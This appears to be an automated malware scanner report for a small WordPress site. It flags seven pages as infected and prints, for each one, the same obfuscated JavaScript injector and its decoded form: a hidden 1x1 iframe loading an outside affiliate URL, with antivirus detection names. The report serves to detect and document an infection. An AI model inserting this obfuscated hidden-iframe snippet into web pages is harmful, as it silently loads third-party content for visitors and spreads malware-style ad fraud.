New scan:

Malware Scanner report for equivalentes902.es

Malicious/Suspicious/Total urls checked
7/0/17
7 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://equivalentes902.es/
200 OK
Content-Length: 301402
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


str='@3c@69@66@72@61@6d@65@20@73@72@63@3d@22@68@74@74@70@3a@2f@2f@61@64@2e@7a@61@6e@6f@78@2e@63@6f@6d@2f@70@70@63@2f@3f@32@37@35@31@33@33@30@39@43@35@31@30@38@35@30@34@33@54@22@20@77@69@64@74@68@3d@22@31@22@20@68@65@69@67@68@74@3d@22@31@22@3e@3c@2f@69@66@72@61@6d@65@3e';
document.write(unescape(str.replace(/@/g,'%')));

Decoded script:


<iframe src="http://ad.zanox.com/ppc/?27174247C68830093T" width="1" height="1"></iframe>

Antivirus reports:

nProtect
Trojan.Iframe.ACG
TrendMicro-HouseCall
Mal_Hifrm
Emsisoft
Trojan.Iframe.ACG (B)
TrendMicro
Mal_Hifrm
MicroWorld-eScan
Trojan.Iframe.ACG
F-Secure
Trojan.Iframe.ACG
VIPRE
Malware.JS.Generic (JS)
GData
Trojan.Iframe.ACG
BitDefender
Trojan.Iframe.ACG

http://equivalentes902.es/wp-includes/js/jquery/jquery.js?ver=1.11.0
200 OK
Content-Length: 96402
Content-Type: application/x-javascript
clean
http://equivalentes902.es/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
200 OK
Content-Length: 7200
Content-Type: application/x-javascript
clean
http://equivalentes902.es/wp-content/themes/k2/js/k2.functions.js?ver=1.0
200 OK
Content-Length: 4765
Content-Type: application/x-javascript
clean
http://equivalentes902.es//pagead2.googlesyndication.com/pagead/show_ads.js/
HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache, must-revalidate, max-age=0
Connection: close
Date: Sun, 27 Jul 2014 03:49:24 GMT
Pragma: no-cache
Location: http://equivalentes902.es/pagead2.googlesyndication.com/pagead/show_ads.js/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
X-Pingback: http://equivalentes902.es/xmlrpc.php
X-Powered-By: PHP/5.4.30
clean
http://equivalentes902.es/pagead2.googlesyndication.com/pagead/show_ads.js/
404 Not Found
Content-Length: 20525
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


str='@3c@69@66@72@61@6d@65@20@73@72@63@3d@22@68@74@74@70@3a@2f@2f@61@64@2e@7a@61@6e@6f@78@2e@63@6f@6d@2f@70@70@63@2f@3f@32@37@35@31@33@33@30@39@43@35@31@30@38@35@30@34@33@54@22@20@77@69@64@74@68@3d@22@31@22@20@68@65@69@67@68@74@3d@22@31@22@3e@3c@2f@69@66@72@61@6d@65@3e';
document.write(unescape(str.replace(/@/g,'%')));

Decoded script:


<iframe src="http://ad.zanox.com/ppc/?27174247C68830093T" width="1" height="1"></iframe>

Antivirus reports:

nProtect
Trojan.Iframe.ACG
TrendMicro-HouseCall
Mal_Hifrm
Emsisoft
Trojan.Iframe.ACG (B)
TrendMicro
Mal_Hifrm
MicroWorld-eScan
Trojan.Iframe.ACG
F-Secure
Trojan.Iframe.ACG
VIPRE
Malware.JS.Generic (JS)
GData
Trojan.Iframe.ACG
BitDefender
Trojan.Iframe.ACG

http://equivalentes902.es/wp-content/themes/k2/js/k2.slider.js?ver=1.0
200 OK
Content-Length: 3531
Content-Type: application/x-javascript
clean
http://equivalentes902.es/wp-content/themes/k2/js/k2.trimmer.js?ver=1.0
200 OK
Content-Length: 2260
Content-Type: application/x-javascript
clean
http://equivalentes902.es/wp-content/themes/k2/js/k2.rollingarchives.js?ver=1.0
200 OK
Content-Length: 3573
Content-Type: application/x-javascript
clean
http://equivalentes902.es/wp-content/themes/k2/js/k2.livesearch.js?ver=1.0
200 OK
Content-Length: 3011
Content-Type: application/x-javascript
clean
http://equivalentes902.es/?p=2
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 27 Jul 2014 03:49:27 GMT
Location: http://equivalentes902.es/2014/05/06/2/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Link: <http://equivalentes902.es/?p=2>; rel=shortlink
X-Pingback: http://equivalentes902.es/xmlrpc.php
X-Powered-By: PHP/5.4.30
clean
http://equivalentes902.es/2014/05/06/2/
200 OK
Content-Length: 253263
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


str='@3c@69@66@72@61@6d@65@20@73@72@63@3d@22@68@74@74@70@3a@2f@2f@61@64@2e@7a@61@6e@6f@78@2e@63@6f@6d@2f@70@70@63@2f@3f@32@37@35@31@33@33@30@39@43@35@31@30@38@35@30@34@33@54@22@20@77@69@64@74@68@3d@22@31@22@20@68@65@69@67@68@74@3d@22@31@22@3e@3c@2f@69@66@72@61@6d@65@3e';
document.write(unescape(str.replace(/@/g,'%')));

Decoded script:


<iframe src="http://ad.zanox.com/ppc/?27174247C68830093T" width="1" height="1"></iframe>

Antivirus reports:

nProtect
Trojan.Iframe.ACG
TrendMicro-HouseCall
Mal_Hifrm
Emsisoft
Trojan.Iframe.ACG (B)
TrendMicro
Mal_Hifrm
MicroWorld-eScan
Trojan.Iframe.ACG
F-Secure
Trojan.Iframe.ACG
VIPRE
Malware.JS.Generic (JS)
GData
Trojan.Iframe.ACG
BitDefender
Trojan.Iframe.ACG

http://equivalentes902.es/wp-includes/js/comment-reply.min.js?ver=3.9.1
200 OK
Content-Length: 757
Content-Type: application/x-javascript
clean
http://equivalentes902.es/2013/01/08/equivalentes-902-todos-los-equivalentes-902-en-una-sola-web/
200 OK
Content-Length: 164540
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


str='@3c@69@66@72@61@6d@65@20@73@72@63@3d@22@68@74@74@70@3a@2f@2f@61@64@2e@7a@61@6e@6f@78@2e@63@6f@6d@2f@70@70@63@2f@3f@32@37@35@31@33@33@30@39@43@35@31@30@38@35@30@34@33@54@22@20@77@69@64@74@68@3d@22@31@22@20@68@65@69@67@68@74@3d@22@31@22@3e@3c@2f@69@66@72@61@6d@65@3e';
document.write(unescape(str.replace(/@/g,'%')));

Decoded script:


<iframe src="http://ad.zanox.com/ppc/?27174247C68830093T" width="1" height="1"></iframe>

Antivirus reports:

nProtect
Trojan.Iframe.ACG
TrendMicro-HouseCall
Mal_Hifrm
Emsisoft
Trojan.Iframe.ACG (B)
TrendMicro
Mal_Hifrm
MicroWorld-eScan
Trojan.Iframe.ACG
F-Secure
Trojan.Iframe.ACG
VIPRE
Malware.JS.Generic (JS)
GData
Trojan.Iframe.ACG
BitDefender
Trojan.Iframe.ACG

http://equivalentes902.es/2011/03/17/hola-mundo/
200 OK
Content-Length: 169481
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


str='@3c@69@66@72@61@6d@65@20@73@72@63@3d@22@68@74@74@70@3a@2f@2f@61@64@2e@7a@61@6e@6f@78@2e@63@6f@6d@2f@70@70@63@2f@3f@32@37@35@31@33@33@30@39@43@35@31@30@38@35@30@34@33@54@22@20@77@69@64@74@68@3d@22@31@22@20@68@65@69@67@68@74@3d@22@31@22@3e@3c@2f@69@66@72@61@6d@65@3e';
document.write(unescape(str.replace(/@/g,'%')));

Decoded script:


<iframe src="http://ad.zanox.com/ppc/?27174247C68830093T" width="1" height="1"></iframe>

Antivirus reports:

nProtect
Trojan.Iframe.ACG
TrendMicro-HouseCall
Mal_Hifrm
Emsisoft
Trojan.Iframe.ACG (B)
TrendMicro
Mal_Hifrm
MicroWorld-eScan
Trojan.Iframe.ACG
F-Secure
Trojan.Iframe.ACG
VIPRE
Malware.JS.Generic (JS)
GData
Trojan.Iframe.ACG
BitDefender
Trojan.Iframe.ACG

http://equivalentes902.es/category/uncategorized/
200 OK
Content-Length: 301312
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


str='@3c@69@66@72@61@6d@65@20@73@72@63@3d@22@68@74@74@70@3a@2f@2f@61@64@2e@7a@61@6e@6f@78@2e@63@6f@6d@2f@70@70@63@2f@3f@32@37@35@31@33@33@30@39@43@35@31@30@38@35@30@34@33@54@22@20@77@69@64@74@68@3d@22@31@22@20@68@65@69@67@68@74@3d@22@31@22@3e@3c@2f@69@66@72@61@6d@65@3e';
document.write(unescape(str.replace(/@/g,'%')));

Decoded script:


<iframe src="http://ad.zanox.com/ppc/?27174247C68830093T" width="1" height="1"></iframe>

Antivirus reports:

nProtect
Trojan.Iframe.ACG
TrendMicro-HouseCall
Mal_Hifrm
Emsisoft
Trojan.Iframe.ACG (B)
TrendMicro
Mal_Hifrm
MicroWorld-eScan
Trojan.Iframe.ACG
F-Secure
Trojan.Iframe.ACG
VIPRE
Malware.JS.Generic (JS)
GData
Trojan.Iframe.ACG
BitDefender
Trojan.Iframe.ACG

http://equivalentes902.es/tag/902/
200 OK
Content-Length: 162040
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


str='@3c@69@66@72@61@6d@65@20@73@72@63@3d@22@68@74@74@70@3a@2f@2f@61@64@2e@7a@61@6e@6f@78@2e@63@6f@6d@2f@70@70@63@2f@3f@32@37@35@31@33@33@30@39@43@35@31@30@38@35@30@34@33@54@22@20@77@69@64@74@68@3d@22@31@22@20@68@65@69@67@68@74@3d@22@31@22@3e@3c@2f@69@66@72@61@6d@65@3e';
document.write(unescape(str.replace(/@/g,'%')));

Decoded script:


<iframe src="http://ad.zanox.com/ppc/?27174247C68830093T" width="1" height="1"></iframe>

Antivirus reports:

nProtect
Trojan.Iframe.ACG
TrendMicro-HouseCall
Mal_Hifrm
Emsisoft
Trojan.Iframe.ACG (B)
TrendMicro
Mal_Hifrm
MicroWorld-eScan
Trojan.Iframe.ACG
F-Secure
Trojan.Iframe.ACG
VIPRE
Malware.JS.Generic (JS)
GData
Trojan.Iframe.ACG
BitDefender
Trojan.Iframe.ACG


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: equivalentes902.es

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 27 Jul 2014 03:49:18 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
X-Pingback: http://equivalentes902.es/xmlrpc.php
X-Powered-By: PHP/5.4.30
Second query (visit from search engine):
GET / HTTP/1.1
Host: equivalentes902.es
Referer: http://www.google.com/search?q=equivalentes902.es

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=equivalentes902.es

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://equivalentes902.es/

Result: equivalentes902.es is not infected or malware details are not published yet.